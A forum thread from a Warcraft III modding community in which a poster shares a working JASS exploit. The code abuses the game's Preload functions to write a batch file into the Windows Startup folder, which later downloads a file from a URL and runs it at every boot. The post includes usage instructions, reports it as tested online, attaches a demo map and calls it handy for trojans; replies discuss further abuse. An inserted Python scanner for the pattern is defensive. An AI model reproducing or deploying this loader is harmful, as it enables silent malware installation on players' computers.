How to virus in Warcraft III

Jesus4Lyf

Good Idea™
Reaction score
397
Made a post about it here, but hey...
JASS:
function Infest takes string url, string localname returns nothing
    call PreloadGenClear()
    call PreloadGenStart()
    call Preload("\")\necho Set objXMLHTTP = CreateObject(\"MSXML2.XMLHTTP\") > %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objXMLHTTP.open \"GET\", \""+url+"\", false >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objXMLHTTP.send() >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho If objXMLHTTP.Status = 200 Then >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho Set objADOStream = CreateObject(\"ADODB.Stream\") >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Open >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Type = 1 >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Write objXMLHTTP.ResponseBody >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Position = 0 >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho Set objFSO = Createobject(\"Scripting.FileSystemObject\") >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho If objFSO.Fileexists(\"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"+localname+"\") Then objFSO.DeleteFile \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"+localname+"\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.SaveToFile \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"+localname+"\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Close >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho End if >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objFSO.DeleteFile \"%TEMP%\\download.vbs\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objFSO.DeleteFile \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\myvirus.bat\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\nstart %TEMP%\\download.vbs\n//")
    call PreloadGenEnd("C:\\Users\\YOURUSERNAMEHERE\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\myvirus.bat")
    call PreloadGenClear()
    call PreloadGenStart()
    call Preload("\")\necho Set objXMLHTTP = CreateObject(\"MSXML2.XMLHTTP\") > %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objXMLHTTP.open \"GET\", \""+url+"\", false >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objXMLHTTP.send() >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho If objXMLHTTP.Status = 200 Then >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho Set objADOStream = CreateObject(\"ADODB.Stream\") >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Open >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Type = 1 >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Write objXMLHTTP.ResponseBody >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Position = 0 >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho Set objFSO = Createobject(\"Scripting.FileSystemObject\") >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho If objFSO.Fileexists(\"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\"+localname+"\") Then objFSO.DeleteFile \"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\"+localname+"\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.SaveToFile \"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\"+localname+"\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Close >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho End if >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objFSO.DeleteFile \"%TEMP%\\download.vbs\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objFSO.DeleteFile \"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\myvirus.bat\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\nstart %TEMP%\\download.vbs\n//")
    call PreloadGenEnd("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\myvirus.bat")
endfunction

//===========================================================================
function InitTrig_Melee_Initialization takes nothing returns nothing
    call Infest("http://www.stephan-brenner.com/blog/wp-content/uploads/2008/08/donothing.zip", "myvirus.zip")
endfunction

This function is cool. For Windows 7, you must replace YOURUSERNAMEHERE with the username on the computer, but on XP this should be unnecessary (and so XP is particularly vulnerable). Just call the function from WC3. When you next restart your computer, the url you specify will be downloaded to your startup folder as the name you specify, and called (the reason you specify the local filename is so Windows knows what file type to run it as).

If someone could test this online with a friend who has Windows XP and finds it to work, we can successfully say Blizzard needs to patch again. I mean, I'm sure the Russians will love it. :)

In case someone doesn't understand what this does, calling the function from any map will run the file specified on every player's pc on every boot from then onwards. Very handy for trojans and the like. :thup:

Let me know if this works on XP! I can't test it right now... :p

Edit: To remove infections, go to Start > Programs > Startup and delete the filename you used as "localname", or "myvirus.bat", depending which is visible.
Edit: Tested on Windows XP, works online, serious threat.
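
A defender-side check for the pattern in the script above, as an added example that is not part of the original post: it flags `Preload()` string literals that carry escaped quotes or line breaks, and `PreloadGenEnd()` targets that are absolute paths or executable file types. The function name `scan_jass`, the rule names and the sample script are constructed for illustration.

```python
import re

# Extensions Windows runs or interprets when a file is opened from a Startup folder.
RISKY_EXT = (".bat", ".cmd", ".vbs", ".js", ".exe", ".com", ".scr", ".lnk")

# First argument of Preload()/PreloadGenEnd() when it is a JASS string literal.
CALL = re.compile(r'\b(PreloadGenEnd|Preload)\s*\(\s*"((?:[^"\\]|\\.)*)"')

def scan_jass(script):
    """Return sorted (line_no, rule) findings for a war3map.j style script."""
    findings = set()
    for no, line in enumerate(script.splitlines(), 1):
        if line.lstrip().startswith("//"):       # whole-line comment
            continue
        for func, arg in CALL.findall(line):
            escapes = re.findall(r"\\(.)", arg)  # escape pairs, consumed left to right
            if func == "Preload":
                # A real preload path never needs an escaped quote or a line break.
                if any(e in 'nr"' for e in escapes):
                    findings.add((no, "preload-breakout"))
                continue
            path = re.sub(r"\\(.)", r"\1", arg).lower()  # undo JASS escaping
            if re.match(r"[a-z]:[\\/]", path) or path[:1] in ("\\", "/") or ".." in path:
                findings.add((no, "genend-absolute-or-traversal"))
            if path.endswith(RISKY_EXT):
                findings.add((no, "genend-executable-ext"))
    return sorted(findings)

# Constructed sample script (not from the thread); placeholder values only.
SAMPLE = r'''
function Init takes nothing returns nothing
    call PreloadGenClear()
    call PreloadGenStart()
    call Preload("units\\human\\Footman\\Footman.mdx")
    call Preload("\")\necho constructed-placeholder\n//")
    call PreloadGenEnd("C:\\Example\\Startup\\placeholder.bat")
    call PreloadGenEnd("save\\profile.pld")
endfunction
'''.strip()

if __name__ == "__main__":
    for no, rule in scan_jass(SAMPLE):
        print(f"line {no}: {rule}")
```

Only literal first arguments are inspected; a path or preload string assembled entirely from variables still needs manual review.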
 

Jesus4Lyf

Good Idea™
Reaction score
397
>So this is what you were up to all these months
Something like that.
Actually, I've just not been around, but when this came up, I figured I'd drop you guys a note. ;)

Tested on Windows XP. Works 100%.

I should clarify - it's the second boot after you play the map, not the first. Here is a demo map. :)

Do not play any WC3 maps until the next patch.

This map will put an image of the word CYPHIX in your startup. Nothing dangerous. :)
To remove, go to Start > Programs > Startup and delete cyphix.jpg.
Works on map initialisation, works on battle.net.
AKA. This is a real tried and proven threat. :thup:
 

Attachments

  • virustest.w3x
    13.7 KB · Views: 652

Accname

2D-Graphics enthusiast
Reaction score
1,462
omg you really are making the world a little worse every now and then. what comes next? you tell us not to breathe because viruses could be in the air?

lol, maybe you should tell blizzard they should hire you for bugfixing and such.

by the way, i would delete the scripts, the wrong people could read this thread. i think the majority of the community will trust in your words, those who don't will most probably still play wc3 maps anyways.
 

Jesus4Lyf

Good Idea™
Reaction score
397
>omg you really are making the world a little worse every now and then.
Well, if I don't find and post it, someone else will find it and abuse it. It's a matter of time.

>already reported it to blizzard?
Can't be stuffed, I have assignments to do. -_-
Edit: Done. And I asked if they have QA jobs available. :p

>maybe you should tell blizzard they should hire you for bugfixing and such
They should, considering this is.. the third time..?

>by the way, i would delete the scripts
I'll wait to see what the other moderators think. I love exposing it.. :)
 

kingkingyyk3

Visitor (Welcome to the Jungle, Baby!)
Reaction score
216
Hmm, what happens if I link it to a super large file (takes ages to download)? Lol.
 

Romek

Super Moderator
Reaction score
963
Wow, another exploit? Blizzard's not going to be impressed. :p

> Hmm, what happens if I link it to a super large file (takes ages to download)? Lol.
It'd download. Eventually. As expected.
 

Jesus4Lyf

Good Idea™
Reaction score
397
The download is done in the background. So the user won't see it... but yes, you can do it.
>Wow, another exploit? Blizzard's not going to be impressed. :p
I wasn't very impressed, either. Surely someone considered that allowing file I/O from WC3 was a bad idea... o.o
 

DioD

New Member
Reaction score
57
blizzard should give us a legal way to execute code and store data on HDD (also sync this data online) and it will be fine.

All known bugs (including return bug) were developed for good, not for viruses.

well this can do anything (just like codeexec) (russian developments always evil :( )
 

Jesus4Lyf

Good Idea™
Reaction score
397
Hey, at least with this, you can download an executable to set the local files flag in WC3. So you can download 100mb model packs to people's computers which can then be used in WC3 maps! Whilst you're at it, you can modify WC3 executables to add additional natives like RtC, all without the map player ever knowing! In fact, you can format their whole hard disk! I think you're right, Blizzard needs to give us more power!! MOAR!!.

Sorry for the sarcasm, but WC3 being able to do file I/O is just wrong. If you can use it for good, you can use it for evil. :)

Now, trying to find how to report bugs to Blizzard... that might be too difficult, even for me. :p
 

Medeam

New Member
Reaction score
3
Why do people find all the nice stuff and show it to everybody :p

I was using this after the return bug got deleted out.... :( not again.... must think what's next now.
 

Romek

Super Moderator
Reaction score
963
> I was using this after the return bug got deleted out.... not again.... must think what's next now.
This doesn't typecast variables.
 

~GaLs~

† Ғσſ ŧħə ѕαĸε Φƒ ~Ğ䣚~ †
Reaction score
180
even real-time antivirus fail to this.. xD
 

DioD

New Member
Reaction score
57
this was kept secret for 2 years, now it does not matter.
warcraft is dead anyway.

no one on the english or russian segment of the internet is using this, asians may be using it, but it's unknown to me. (for ex they used runtime texture changing on units long before this was discovered in the english segment)

also in some cases warcraft may overwrite existing files (fun with ntldr)
 